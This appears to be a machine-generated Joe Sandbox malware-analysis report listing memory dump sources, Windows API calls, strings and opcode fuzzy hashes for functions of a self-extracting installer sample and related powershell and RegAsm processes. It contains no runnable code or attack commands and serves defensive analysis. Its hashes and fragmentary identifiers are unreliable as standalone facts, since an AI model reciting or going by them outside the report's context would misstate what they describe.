                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                           • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
                                                          • Instruction ID: ed5859e0b0790e6599a6a30fab1b9835d6f78c5ee04887c3ee0e5099c0a92b06
                                                          • Opcode Fuzzy Hash: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
                                                          • Instruction Fuzzy Hash: 5DB09210E25402C1DA5CAB219C8506113A0FB58364FC008B0C00DC0120DE2CA19A8710
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                           • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                          • String ID: "$:$@$RegServer
                                                          • API String ID: 1203814774-4077547207
                                                          • Opcode ID: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                                          • Instruction ID: 182d65c87fce8af93dde9e1513999e5c2b15937c8ec142f67aa3809c3b312309
                                                          • Opcode Fuzzy Hash: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                                          • Instruction Fuzzy Hash: 8B02F221E0C68246FEFC8B2494102B96BA1EFC67F0F5809B5DA5E866B5DF3DE401C760
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6975A35E3), ref: 00007FF6975A4A86
                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6975A35E3), ref: 00007FF6975A4AAA
                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6975A35E3), ref: 00007FF6975A4ACA
                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6975A35E3), ref: 00007FF6975A4AEC
                                                          • GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6975A35E3), ref: 00007FF6975A4B1B
                                                          • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6975A35E3), ref: 00007FF6975A4B3A
                                                          • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6975A35E3), ref: 00007FF6975A4B54
                                                          • FreeLibrary.KERNEL32 ref: 00007FF6975A4BF1
                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6975A35E3), ref: 00007FF6975A4C0D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                           • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                          • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                          • API String ID: 1865808269-1731843650
                                                          • Opcode ID: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                                          • Instruction ID: 533db199206ea3ce1f5a4cda48f83f94030315c84b4ca11395d5c83ff5852e5f
                                                          • Opcode Fuzzy Hash: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                                          • Instruction Fuzzy Hash: 27519435A0DB8686EBA88B15B81017A7BA1FF89BE1F4441B4DE4E87794DF3CE844C710
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                           • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
                                                          • String ID: 52352352352$rce.
                                                          • API String ID: 2929476258-3400312407
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                          • API String ID: 2659952014-2428544900
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                          • String ID: 52352352352
                                                          • API String ID: 3785188418-1175956450
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                          • String ID: Control Panel\Desktop\ResourceLocale
                                                          • API String ID: 3346862599-1109908249
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                          • String ID: CheckTokenMembership$advapi32.dll
                                                          • API String ID: 4204503880-1888249752
                                                          APIs
                                                          Similarity
                                                          • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                          • String ID:
                                                          • API String ID: 1051330783-0
                                                          APIs
                                                          Similarity
                                                          • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                                                          • String ID:
                                                          • API String ID: 975904313-0
                                                          APIs
                                                            • Part of subcall function 00007FF6975A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A5078
                                                            • Part of subcall function 00007FF6975A5050: SizeofResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A5089
                                                            • Part of subcall function 00007FF6975A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50AF
                                                            • Part of subcall function 00007FF6975A5050: LoadResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50C0
                                                            • Part of subcall function 00007FF6975A5050: LockResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50CF
                                                            • Part of subcall function 00007FF6975A5050: memcpy_s.MSVCRT ref: 00007FF6975A50EE
                                                            • Part of subcall function 00007FF6975A5050: FreeResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50FD
                                                          • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF6975A3139), ref: 00007FF6975A3F95
                                                          • LocalFree.KERNEL32 ref: 00007FF6975A4018
                                                            • Part of subcall function 00007FF6975A4DCC: LoadStringA.USER32 ref: 00007FF6975A4E60
                                                            • Part of subcall function 00007FF6975A4DCC: MessageBoxA.USER32 ref: 00007FF6975A4EA0
                                                            • Part of subcall function 00007FF6975A7700: GetLastError.KERNEL32 ref: 00007FF6975A7704
                                                          • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF6975A3139), ref: 00007FF6975A403E
                                                          • LocalFree.KERNEL32(?,?,?,?,?,00007FF6975A3139), ref: 00007FF6975A409F
                                                            • Part of subcall function 00007FF6975A7AC8: FindResourceA.KERNEL32 ref: 00007FF6975A7AF2
                                                            • Part of subcall function 00007FF6975A7AC8: LoadResource.KERNEL32 ref: 00007FF6975A7B09
                                                            • Part of subcall function 00007FF6975A7AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF6975A7B3F
                                                            • Part of subcall function 00007FF6975A7AC8: FreeResource.KERNEL32 ref: 00007FF6975A7B51
                                                          • LocalFree.KERNEL32 ref: 00007FF6975A4078
                                                          Strings
                                                          Similarity
                                                          • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                          • String ID: <None>$LICENSE
                                                          • API String ID: 2414642746-383193767
                                                          APIs
                                                            • Part of subcall function 00007FF6975A114C: _vsnprintf.MSVCRT ref: 00007FF6975A1189
                                                          • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6975A606F), ref: 00007FF6975A7763
                                                          • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6975A606F), ref: 00007FF6975A7772
                                                          • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6975A606F), ref: 00007FF6975A77B8
                                                          • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6975A606F), ref: 00007FF6975A77EC
                                                          • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6975A606F), ref: 00007FF6975A7805
                                                          Strings
                                                          Similarity
                                                          • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                          • String ID: UPDFILE%lu
                                                          • API String ID: 2922116661-2329316264
                                                          APIs
                                                          Similarity
                                                          • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                          • String ID:
                                                          • API String ID: 3370778649-0
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                          • String ID: wininit.ini
                                                          • API String ID: 3273605193-4206010578
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: Window$Text$DesktopDialogForegroundItem
                                                          • String ID: 52352352352
                                                          • API String ID: 761066910-1175956450
                                                          APIs
                                                            • Part of subcall function 00007FF6975A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A5078
                                                            • Part of subcall function 00007FF6975A5050: SizeofResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A5089
                                                            • Part of subcall function 00007FF6975A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50AF
                                                            • Part of subcall function 00007FF6975A5050: LoadResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50C0
                                                            • Part of subcall function 00007FF6975A5050: LockResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50CF
                                                            • Part of subcall function 00007FF6975A5050: memcpy_s.MSVCRT ref: 00007FF6975A50EE
                                                            • Part of subcall function 00007FF6975A5050: FreeResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50FD
                                                          • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF6975A3388), ref: 00007FF6975A4975
                                                          • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF6975A3388), ref: 00007FF6975A4A11
                                                            • Part of subcall function 00007FF6975A4DCC: LoadStringA.USER32 ref: 00007FF6975A4E60
                                                            • Part of subcall function 00007FF6975A4DCC: MessageBoxA.USER32 ref: 00007FF6975A4EA0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                          • String ID: <None>$@$FINISHMSG
                                                          • API String ID: 3507850446-4126004490
                                                          • Opcode ID: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                                          • Instruction ID: bb7e209c6d42e351731133ce24d49659659c9e5df026e3a82b9ea0e99514bbac
                                                          • Opcode Fuzzy Hash: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                                          • Instruction Fuzzy Hash: 6311D572A0835287FBB89B24F41077A77A1FB897E4F449175DA4E86B89DF3CD4048B14
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$AttributesFile
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                          • API String ID: 438848745-1955609190
                                                          • Opcode ID: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                          • Instruction ID: aebec5291449a85345f06bfc76990e81add2ec166b7e8db35752b5fa235cde3c
                                                          • Opcode Fuzzy Hash: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                          • Instruction Fuzzy Hash: 2811A531A18A8296EFB58B10E4503F977A0FF897A4F8446B1C65D826A5DF3DD609C720
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                          • String ID:
                                                          • API String ID: 1273765764-0
                                                          • Opcode ID: d24c32f5bf32a5b72a732329d1a2a01ce98f5d85b6cb7ead8bb70bc12569425c
                                                          • Instruction ID: 68d35b0466e7da40de4d87d09f1df925d07528765d2b47df8349ba5f61159c21
                                                          • Opcode Fuzzy Hash: d24c32f5bf32a5b72a732329d1a2a01ce98f5d85b6cb7ead8bb70bc12569425c
                                                          • Instruction Fuzzy Hash: 28116061A08A8586EEB85B54F4053B9A7A0FB8DBF4F444271CA5E863D9CF3CD045CB10
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
                                                          • String ID: 52352352352
                                                          • API String ID: 2312377310-1175956450
                                                          • Opcode ID: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                                          • Instruction ID: f92323142209792acdbb6a3a1dcb3a5227cf8dad8a6d3e60f121e1de5cf538e7
                                                          • Opcode Fuzzy Hash: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                                          • Instruction Fuzzy Hash: 0BA18D32E1928386FBF88B11944467A66A4FF547E8F5501BAE91DC3284DF3DE845CB20
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleWrite
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                          • API String ID: 1065093856-388467436
                                                          • Opcode ID: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                                          • Instruction ID: fbdd95352103298d2d09cc878b723b5a1cdacdc8bdd065492e3ca5f2b8a718ac
                                                          • Opcode Fuzzy Hash: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                                          • Instruction Fuzzy Hash: 593194727187818AEBA58F20E4407BAB7A0FB897E4F444675DA9D87794CF7CD408CB20
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: *MEMCAB
                                                          • API String ID: 0-3211172518
                                                          • Opcode ID: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                                          • Instruction ID: f9e614ddf58a1e5ae812ae9ecffb041ca456e8316dc686563c48a8c65cdf9ab4
                                                          • Opcode Fuzzy Hash: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                                          • Instruction Fuzzy Hash: 1E316BB1A18B42C5EBA88B20E4487B977A0FB447E0F844276D96D82794EF3CE549C760
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                          • String ID:
                                                          • API String ID: 140117192-0
                                                          • Opcode ID: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                          • Instruction ID: b7e265b2a2bf2c568951307b56df0b191dd5a04aee44c5e32c1a63df69b39a20
                                                          • Opcode Fuzzy Hash: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                          • Instruction Fuzzy Hash: 3E41EA35A08B0585EBA8CB18F89036977A8FB897E4F904176D98DC3764DF7DE444C760
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Char$Prev$Next
                                                          • String ID:
                                                          • API String ID: 3260447230-0
                                                          • Opcode ID: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                          • Instruction ID: 01c30de697aed2ac5a9a217dafcc9f8dcdfc0e76103fa28e2c471b4409e54e9b
                                                          • Opcode Fuzzy Hash: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                          • Instruction Fuzzy Hash: CE118A62A0869185FFA94B11B514279AF91EB8DFF1F4986B0DA5F47794CF3CD4408710
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                          • String ID:
                                                          • API String ID: 140117192-0
                                                          • Opcode ID: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                          • Instruction ID: 742938c7e32b7dd5fdd53b4a92f13843b114e57f284c4a27039f02d2700f3f84
                                                          • Opcode Fuzzy Hash: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                          • Instruction Fuzzy Hash: 9221D535908B46C5EBA8CB44F8803A977B8FB89BA4F900176DA8D83764DF7DE454C760
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                          • String ID:
                                                          • API String ID: 2776232527-0
                                                          • Opcode ID: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                          • Instruction ID: 3c6e3ef0f15f597e822fe14035dcff7acf800b3215cf0eac475c45ce8e10e1d5
                                                          • Opcode Fuzzy Hash: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                          • Instruction Fuzzy Hash: 42118632A18786C7FBF48F20E444B7ABA91FF99799F409170DA4A82984DF3CD448CB10
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2677026903.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd34540000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                          • Instruction ID: beb75e083c9451410778db7af2e0200886696d0147cd5d5cddc61f0df38a43ea
                                                          • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                          • Instruction Fuzzy Hash: D801A77020CB0C4FDB44EF0CE051AB6B7E0FB95320F10056DE58AC3661D636E882CB41

                                                          Execution Graph

                                                          Execution Coverage:14.6%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:5
                                                          Total number of Limit Nodes:0

                                                          Control-flow Graph

                                                          APIs
                                                          • CoInitializeSecurity.COMBASE(?,?,?,?,00000000,?,?,?,?), ref: 028DF3A7
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2296904061.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_28d0000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: InitializeSecurity
                                                          • String ID:
                                                          • API String ID: 640775948-0
                                                          • Opcode ID: 4bf7908d413926113c6dbf806aaeacca704e4fafd21ee3307b8fe3fbfb6211da
                                                          • Instruction ID: fa915e930b83752024ac699588e6b4471326e9c879011a6fb52f1b704adc9e7e
                                                          • Opcode Fuzzy Hash: 4bf7908d413926113c6dbf806aaeacca704e4fafd21ee3307b8fe3fbfb6211da
                                                          • Instruction Fuzzy Hash: 1B111276800249DFCF10CF9AD944ADEBFF4FB48314F148419EA29A7210C339A554CFA1

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_4f40000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 25ca6fe36c7b0b15bd9644d38c4305ddede612924d68b983384ffeee1755d4cc
                                                          • Instruction ID: 7c281a6d13db5f3b859160e60c49f1a3abc25a56c9de10d2a2192b8da53ed414
                                                          • Opcode Fuzzy Hash: 25ca6fe36c7b0b15bd9644d38c4305ddede612924d68b983384ffeee1755d4cc
